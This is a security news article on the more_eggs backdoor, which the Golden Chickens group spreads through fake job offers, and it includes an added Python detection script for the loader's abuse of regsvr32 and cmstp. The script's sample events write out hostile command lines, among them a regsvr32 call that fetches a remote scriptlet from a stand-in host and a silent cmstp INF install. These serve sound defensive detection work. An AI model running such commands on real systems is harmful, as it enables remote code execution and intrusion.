A cybercriminal group known as Golden Chickens is believed to sell its more_eggs backdoor to attackers who target LinkedIn users. The gang sells access to systems infected with the malware to high-profile cybercrime groups, including FIN6, Cobalt Group, and Evilnum, all known for sophisticated attacks on corporate and government organizations.
The more_eggs backdoor lets attackers execute various operations on the target device, including taking remote control of the infected machine.
The attackers send phishing emails with job offers to professionals in the healthcare industry. Researchers at cybersecurity company eSentire point out that the method is identical to tactics Golden Chickens has used in the past.
The phishing emails contain a ZIP file named after the job position on offer. If opened, the attachment executes a stealthy component called VenomLNK.
VenomLNK then uses Windows Management Instrumentation (WMI) to fetch a second-stage malware loader named TerraLoader.
TerraLoader abuses two legitimate Windows binaries (cmstp.exe and regsvr32.exe) to load the final payload, TerraPreter.
TerraPreter evades network detection by being hosted on Amazon AWS and delivered as an ActiveX control, which allows execution via Internet Explorer.
Meanwhile, TerraLoader hides the malicious activity from the user: it drops and opens a Microsoft Word document containing an employment application, as described in the phishing email.
Once installed, TerraPreter connects to the attackers' command and control (C&C) server and registers the infection.
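The chain above gives a defender three concrete hooks in endpoint telemetry: a script host or LOLBin spawned directly by the WMI provider host, regsvr32.exe loading a remote scriptlet, and cmstp.exe performing a silent INF install. The following Python is an added example, not code from eSentire or from this page, that scans constructed Sysmon-style process-creation events (parent image, image, command line) for those patterns. The report does not give the exact command lines TerraLoader uses, so the example matches the generic, well-documented abuse forms of these two binaries (regsvr32 with /i:<URL> and scrobj.dll, cmstp with /ni /s <file>.inf); the hostnames, paths and event records are constructed.

```python
"""Heuristic detection for the LOLBin stages of the more_eggs chain described above.

Constructed Sysmon-style process-creation events are checked for three patterns:
  * regsvr32.exe pulling a remote scriptlet through scrobj.dll
  * cmstp.exe performing a silent INF install (/ni /s)
  * a script host or LOLBin spawned directly by WmiPrvSE.exe (WMI provider host)
The command-line forms are the generic abuse patterns for these binaries, not
the specific invocations used by TerraLoader (which the report does not give).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Script hosts and LOLBins that WmiPrvSE.exe should not normally spawn on a workstation.
SCRIPT_HOSTS = {
    "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
    "cmd.exe", "regsvr32.exe", "cmstp.exe", "rundll32.exe",
}

# regsvr32 "squiblydoo"-style invocation: /i:<URL> handed to the scriptlet COM server scrobj.dll.
REGSVR32_REMOTE_SCT = re.compile(r"/i:\s*\"?https?://", re.IGNORECASE)
SCROBJ_DLL = re.compile(r"scrobj\.dll", re.IGNORECASE)


def basename(path: str) -> str:
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def tokens(command_line: str) -> list:
    # Cheap tokenisation: split on whitespace and strip surrounding quotes.
    # Quoted paths containing spaces are split, which is acceptable for flag matching.
    return [t.strip('"').lower() for t in command_line.split()]


def classify(ev: ProcEvent) -> list:
    """Return the suspicious patterns matched by one event (empty list if none)."""
    findings = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    toks = tokens(ev.command_line)

    if image == "regsvr32.exe" and (
        REGSVR32_REMOTE_SCT.search(ev.command_line) or SCROBJ_DLL.search(ev.command_line)
    ):
        findings.append("regsvr32 loading remote scriptlet via scrobj.dll")

    if image == "cmstp.exe" and "/ni" in toks and "/s" in toks and any(t.endswith(".inf") for t in toks):
        findings.append("cmstp silent INF install (/ni /s)")

    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        findings.append("WMI provider host spawned a script host or LOLBin")

    return findings


def scan(events) -> dict:
    """Map event index -> findings for every event that matched at least one pattern."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    # 0: regsvr32 spawned from WMI, fetching a remote scriptlet
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s /n /u /i:https://files.example.invalid/stage.sct scrobj.dll'),
    # 1: silent cmstp INF install from a user-writable path
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\cmstp.exe",
              r'cmstp.exe /ni /s "C:\Users\Public\profile.inf"'),
    # 2: benign regsvr32 registering a local DLL during an installer run
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"'),
    # 3: benign cmstp installing a connection profile without /ni
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmstp.exe",
              r'cmstp.exe /s "C:\ProgramData\Vendor\vpn.inf"'),
]


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx].image), findings)
```

Events 0 and 1 are flagged (event 0 on two rules), while the two benign installer-style invocations pass. In production the same rules map directly onto Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) or an EDR process-tree query; the WmiPrvSE.exe parent rule is the one most specific to this chain, since the first stage fetches TerraLoader over WMI.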
According to eSentire researchers, Golden Chickens offers its more_eggs botnets as Malware-as-a-Service (MaaS) to a select group of high-profile clients.
FIN6, notorious for attacking point-of-sale systems and stealing card data, used more_eggs to hit retail, hospitality, and food service companies in 2019. In another 2019 campaign, FIN6 used fake job offers as bait to target numerous employees.
Evilnum, a suspected mercenary group known for attacking financial technology companies and trading platforms, has also run a fake job offer campaign.
Cobalt Group, also known as Carbanak, is known for its stealth and patience, sometimes spending months inside victims' networks, and has also been observed using the more_eggs backdoor.
Judging by the sophistication of Golden Chickens' backdoor and of its clients, the attack should be considered a high threat, especially since the attackers may already have spread the malware to critical systems and be preparing their next move.